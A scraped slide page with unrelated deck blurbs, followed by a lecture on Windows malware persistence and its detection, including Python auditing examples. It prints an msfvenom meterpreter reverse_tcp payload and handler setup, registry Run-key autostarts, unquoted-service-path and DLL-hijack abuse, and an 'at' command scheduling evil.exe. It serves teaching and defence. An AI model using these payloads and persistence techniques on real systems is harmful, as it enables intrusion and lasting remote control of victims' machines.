Phusion Passenger is an app server for Node.js, Ruby and Python. It simplifies deployment and administration, increases your server's efficiency and helps identify and solve problems.
In this talk Hongli Lai demonstrates how Passenger simplifies things by integrating with Nginx and by replacing Forever, PM2, Cluster and all sorts of other tools. Hongli also shares what other benefits Passenger has to offer, and what you can expect from future developments.
This document discusses compromising Windows XP systems and remedying vulnerabilities. It begins by explaining terminology and the methodology for deploying attacks, which involves probing targets, finding vulnerabilities, passing exploit information, targeting victims, and loading exploits and payloads. The document then demonstrates attacking a system with the IP address 192.168.1.9 using Metasploit and creating a reverse TCP connection after finding an MS08_067 vulnerability. It also discusses automating attacks using Bash and Python scripts to run Metasploit exploits. Finally, it recommends preventing attacks by scanning for vulnerabilities with Nessus and adopting suggested solutions.
This document summarizes various command line tricks and tools for managing ESXi hosts, including Linux commands like find, grep, cat, and vi, as well as VMware-specific commands like esxtop, vmkfstools, vim-cmd, esxcli, esxupdate, and vm-support. It is divided into four parts that cover understanding the ESXi command line, Linux commands, VMware commands, and using the vMA and scripting. The document provides examples for using these commands to locate files, read logs, control services, get process and disk information, configure networking and storage, manage VMs, troubleshoot issues, and install updates.
How to Make a Field Mandatory in Odoo 17 (Celine George)
In Odoo, making a field required can be done through both Python code and XML views. When you set the required attribute to True in Python code, it makes the field required across all views where it's used. Conversely, when you set the required attribute in XML views, it makes the field required only in the context of that particular view.
Chapter wise All Notes of First year Basic Civil Engineering.pptx (Denish Jangid)
Chapter wise All Notes of First year Basic Civil Engineering
Syllabus
Chapter-1
Introduction to the objective, scope and outcome of the subject
Chapter 2
Introduction: Scope and Specialization of Civil Engineering, Role of civil Engineer in Society, Impact of infrastructural development on economy of country.
Chapter 3
Surveying: Object Principles & Types of Surveying; Site Plans, Plans & Maps; Scales & Unit of different Measurements.
Linear Measurements: Instruments used. Linear Measurement by Tape, Ranging out Survey Lines and overcoming Obstructions; Measurements on sloping ground; Tape corrections, conventional symbols. Angular Measurements: Instruments used; Introduction to Compass Surveying, Bearings and Longitude & Latitude of a Line, Introduction to total station.
Levelling: Instruments used, object of levelling, methods of levelling in brief, and contour maps.
Chapter 4
Buildings: Selection of site for Buildings, Layout of Building Plan, Types of buildings, Plinth area, carpet area, floor space index, Introduction to building byelaws, concept of sun light & ventilation. Components of Buildings & their functions, Basic concept of R.C.C., Introduction to types of foundation
Chapter 5
Transportation: Introduction to Transportation Engineering; Traffic and Road Safety: Types and Characteristics of Various Modes of Transportation; Various Road Traffic Signs, Causes of Accidents and Road Safety Measures.
Chapter 6
Environmental Engineering: Environmental Pollution, Environmental Acts and Regulations, Functional Concepts of Ecology, Basics of Species, Biodiversity, Ecosystem, Hydrological Cycle; Chemical Cycles: Carbon, Nitrogen & Phosphorus; Energy Flow in Ecosystems.
Water Pollution: Water Quality standards, Introduction to Treatment & Disposal of Waste Water. Reuse and Saving of Water, Rain Water Harvesting. Solid Waste Management: Classification of Solid Waste, Collection, Transportation and Disposal of Solid Waste. Recycling of Solid Waste: Energy Recovery, Sanitary Landfill, On-Site Sanitation. Air & Noise Pollution: Primary and Secondary air pollutants, Harmful effects of Air Pollution, Control of Air Pollution. Noise Pollution: Harmful Effects of noise pollution, control of noise pollution, Global warming & Climate Change, Ozone depletion, Greenhouse effect.
Text Books:
1. Palancharmy, Basic Civil Engineering, McGraw Hill publishers.
2. Satheesh Gopi, Basic Civil Engineering, Pearson Publishers.
3. Ketki Rangwala Dalal, Essentials of Civil Engineering, Charotar Publishing House.
4. BCP, Surveying volume 1
How to Setup Warehouse & Location in Odoo 17 Inventory (Celine George)
In this slide, we'll explore how to set up warehouses and locations in Odoo 17 Inventory. This will help us manage our stock effectively, track inventory levels, and streamline warehouse operations.
A Visual Guide to 1 Samuel | A Tale of Two Hearts (Steve Thomason)
These slides walk through the story of 1 Samuel. Samuel is the last judge of Israel. The people reject God and want a king. Saul is anointed as the first king, but he is not a good king. David, the shepherd boy, is anointed, and Saul is envious of him. David shows honor while Saul continues to self-destruct.
2. WARNING
The materials of the lecture are presented only for EDUCATIONAL PURPOSES. The speaker is not responsible for the use of this information for illegal purposes.
3. Creating payload
root@kali:~# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 -f exe -o evill.exe
root@kali:~# msfconsole
msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.0.2 //(your ip)
msf > set LPORT 4444 //(your port)
msf > exploit
4. Typical Attack. V1
[Diagram: the attacker runs the exploit and gets a cmd shell on the victim. The user notices something is wrong ("Hm, smth go wrong, I want to reboot system") and reboots. Result on the attacker's side: "Destination host unreachable", "Connection Lost".]
5. Attack. V2
[Same diagram, but the payload has registered itself under HKLM\Software\Microsoft\Windows\CurrentVersion\Run. After the reboot ("Connection Lost", "System is starting") the cmd shell comes back.]
6. So, what is persistence? What kind of persistence do you know? Is it really a huge problem?
7. Persistence causes programs to run each time a user logs on or the system starts, usually in the background.
"Hackers use persistence, not zero days, to breach companies"
8. Registry autoruns
Run/RunOnce Keys
● HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
● HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
● HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
● HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
● HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies
Keys used by the WinLogon process
● HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
● HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
Startup Keys
● HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
● HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
● HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
● HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User
…
13. Autorun. How to detect?
Link: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns
This utility, which has the most comprehensive knowledge of auto-starting locations of any startup monitor, shows you what programs are configured to run during system bootup or login.
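An added example (not code from the deck) of the triage step that follows an Autoruns or reg query sweep: it parses `reg query` output for the Run keys listed on slide 8 and flags entries whose program sits in a user-writable location. The registry output, the user name `bob` and the value names are constructed; a hit is a triage signal rather than proof, since per-user software legitimately installs under AppData.

```python
"""Flag Run/RunOnce autorun entries started from user-writable paths (added example)."""
import re

# Constructed `reg query <key>` output for two of the slide's autorun keys;
# nothing here was captured from a real host.
REG_QUERY_OUTPUT = """\
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    OneDrive    REG_SZ    "C:\\Users\\bob\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background
    Updater    REG_SZ    C:\\Users\\bob\\AppData\\Roaming\\svc\\update.exe -silent

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\\system32\\SecurityHealthSystray.exe
    evill    REG_SZ    C:\\Users\\Public\\evill.exe
"""

# Path fragments a standard user can write to; a program started from one
# of these at logon deserves a look (signature, hash, install record).
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\",
                 "\\temp\\", "\\downloads\\")


def parse_reg_query(text: str) -> list[tuple[str, str, str]]:
    """Return (key, value name, data) for every value in `reg query` output.

    Key lines start in column 0; value lines are indented and hold
    name, type and data separated by runs of spaces.
    """
    entries, key = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.startswith(" "):
            key = line.strip()
            continue
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        if key and len(parts) == 3:
            entries.append((key, parts[0], parts[2]))
    return entries


def program_of(data: str) -> str:
    """Path of the program inside an autorun value, quoted or not."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:data.index('"', 1)]
    m = re.match(r"(.+?\.exe)", data, re.IGNORECASE)
    return m.group(1) if m else data.split(" ")[0]


def suspicious_autoruns(text: str) -> list[tuple[str, str, str]]:
    """(key, value name, program) for entries started from user-writable paths."""
    hits = []
    for key, name, data in parse_reg_query(text):
        program = program_of(data)
        if any(frag in program.lower() for frag in USER_WRITABLE):
            hits.append((key, name, program))
    return hits


if __name__ == "__main__":
    for key, name, program in suspicious_autoruns(REG_QUERY_OUTPUT):
        print(f"{key}\\{name} -> {program}")
```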
19. Unquoted service path
C:\PROGRAM FILES\SUB DIR\PROGRAM NAME
C:\PROGRAM*FILES\SUB*DIR\PROGRAM*NAME
● c:\program.exe files\sub dir\program name
● c:\program files\sub.exe dir\program name
● c:\program files\sub dir\program.exe name
20. Unquoted service path. How to detect?
cmd>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows" |findstr /i /v """
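As an added example (not from the deck), the same check done on a collected wmic export instead of a one-liner: it parses the query output, keeps the auto-start services outside C:\Windows as the command above does, and for each unquoted path containing spaces lists the binaries Windows would try before the real one, generalizing the three candidates of slide 19; it also produces the quoted path that fixes the service. The wmic output and service names are constructed.

```python
"""Audit service ImagePaths for the unquoted-path problem (added example)."""
import re

# Constructed sample of `wmic service get name,displayname,pathname,startmode`
# (not captured from a real host). Columns are separated by two or more spaces.
WMIC_OUTPUT = """\
DisplayName              Name       PathName                                                  StartMode
Windows Update           wuauserv   C:\\Windows\\system32\\svchost.exe -k netsvcs              Auto
Example Backup Agent     bkagent    C:\\Program Files\\Sub Dir\\Program Name.exe -service      Auto
Quoted Agent             qagent     "C:\\Program Files\\Vendor Tool\\agent.exe" /run            Auto
Manual Thing             mthing     C:\\Tools\\My Tool\\thing.exe                                Manual
"""

# Executable part of an ImagePath (up to the first ".exe") and the arguments after it.
EXE_RE = re.compile(r"(.+?\.exe)(.*)", re.IGNORECASE)


def hijack_candidates(path_name: str) -> list[str]:
    """Executables the Service Control Manager may try before the real one.

    For C:\\Program Files\\Sub Dir\\Program Name.exe the candidates are
    C:\\Program.exe, C:\\Program Files\\Sub.exe and
    C:\\Program Files\\Sub Dir\\Program.exe: every space in the unquoted
    path is a point where the path may be cut and ".exe" appended.
    """
    if path_name.startswith('"'):
        return []                                  # quoted: unambiguous
    m = EXE_RE.match(path_name)
    exe = m.group(1) if m else path_name           # drop service arguments
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def quoted_image_path(path_name: str) -> str:
    """Mitigation: the same ImagePath with the executable quoted, which is
    what `sc config <service> binPath= ...` should be set to."""
    m = EXE_RE.match(path_name)
    if path_name.startswith('"') or not m:
        return path_name
    return f'"{m.group(1)}"{m.group(2)}'


def audit(wmic_text: str) -> dict[str, list[str]]:
    """Map each vulnerable auto-start service to its hijack candidates."""
    findings = {}
    rows = [l for l in wmic_text.splitlines() if l.strip()][1:]   # skip header
    for row in rows:
        cols = re.split(r"\s{2,}", row.strip())
        if len(cols) != 4:
            continue
        _display, name, path, start_mode = cols
        if start_mode.lower() != "auto":           # same filters as the one-liner
            continue
        if path.lower().startswith("c:\\windows"):
            continue
        candidates = hijack_candidates(path)
        if candidates:
            findings[name] = candidates
    return findings


if __name__ == "__main__":
    for svc, cands in audit(WMIC_OUTPUT).items():
        print(svc, "->", cands)
```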
22. Schedule tasks V1 (at). How?
cmd> at 08:00 /EVERY:m,t,w,th,f,s,su "C:\...\evil.exe"
(ALWAYS SYSTEM priv)
C:\Windows\system32> at /?
The AT command schedules commands and programs to run on a computer at a specified time and date. The Schedule service must be running to use the AT command.
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
AT [\\computername] time [/INTERACTIVE] [ /EVERY:date[,...] | /NEXT:date[,...]] "command"
24. Schedule tasks. How to detect?
cmd> schtasks /query /FO CSV /v > schtasks.csv
25. DLL hijacking and PATH magic
Dynamic-link library (or DLL) is Microsoft's implementation of the shared library concept in the Microsoft Windows and OS/2 operating systems.
With both implicit and explicit linking, Windows first searches for "known DLLs", such as Kernel32.dll and User32.dll. Windows then searches for the DLLs in the following sequence:
1. The directory where the executable module for the current process is located.
2. The current directory.
3. The Windows system directory. The GetSystemDirectory function retrieves the path of this directory.
4. The Windows directory. The GetWindowsDirectory function retrieves the path of this directory.
5. The directories listed in the PATH environment variable.
...Do you know your PATH?
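To make the five steps concrete, here is an added example (not from the deck) that models that search order over a constructed fake filesystem and reports which DLLs would be satisfied from a directory ahead of the one they legitimately live in, which is what a PATH audit is meant to catch. The directory names, PATH value and DLL list are all made up; the model also includes Safe DLL search mode, which modern Windows enables by default and which moves the current directory behind the system directories.

```python
"""Model the DLL search order from the slide and find shadowed DLLs (added example)."""

SYSTEM_DIR = "C:\\Windows\\System32"         # what GetSystemDirectory() returns
WINDOWS_DIR = "C:\\Windows"                  # what GetWindowsDirectory() returns
KNOWN_DLLS = {"kernel32.dll", "user32.dll"}  # "known DLLs": always taken from System32

# Constructed fake filesystem: directory -> files it contains.
FS = {
    "C:\\Program Files\\App": {"app.exe", "version.dll"},   # app ships its own copy
    "C:\\Users\\bob\\Downloads": {"dbghelp.dll"},             # stray copy in the cwd
    SYSTEM_DIR: {"kernel32.dll", "dbghelp.dll", "version.dll"},
    "C:\\Users\\bob\\bin": {"helper.dll"},                    # user dir early on PATH
    "C:\\Vendor\\bin": {"helper.dll"},                        # where helper.dll belongs
}
EXE_DIR = "C:\\Program Files\\App"
CWD = "C:\\Users\\bob\\Downloads"
PATH = "C:\\Users\\bob\\bin;C:\\Windows\\System32;C:\\Vendor\\bin"
# Where each DLL the app loads is supposed to come from (constructed).
EXPECTED = {"kernel32.dll": SYSTEM_DIR, "dbghelp.dll": SYSTEM_DIR,
            "version.dll": EXE_DIR, "helper.dll": "C:\\Vendor\\bin"}


def search_order(exe_dir, cwd, path_env, safe_search=False):
    """Directories in load order. safe_search=False is the legacy order on
    the slide (steps 1-5); True is SafeDllSearchMode, on by default since
    Windows XP SP2, which moves the current directory after the system dirs."""
    if safe_search:
        order = [exe_dir, SYSTEM_DIR, WINDOWS_DIR, cwd]
    else:
        order = [exe_dir, cwd, SYSTEM_DIR, WINDOWS_DIR]
    return order + [p for p in path_env.split(";") if p]


def resolve_dll(name, exe_dir, cwd, path_env, fs, safe_search=False):
    """Directory `name` would be loaded from, or None if nothing is found."""
    name = name.lower()
    if name in KNOWN_DLLS:
        return SYSTEM_DIR
    for directory in search_order(exe_dir, cwd, path_env, safe_search):
        if name in {f.lower() for f in fs.get(directory, ())}:
            return directory
    return None


def shadowed_dlls(exe_dir, cwd, path_env, fs, expected, safe_search=False):
    """DLLs that resolve somewhere other than their legitimate directory,
    mapped to the directory that wins; a user-writable winner is the finding."""
    result = {}
    for dll, legit in expected.items():
        found = resolve_dll(dll, exe_dir, cwd, path_env, fs, safe_search)
        if found != legit:
            result[dll] = found
    return result


if __name__ == "__main__":
    for mode in (False, True):
        print("safe search" if mode else "legacy order",
              shadowed_dlls(EXE_DIR, CWD, PATH, FS, EXPECTED, mode))
```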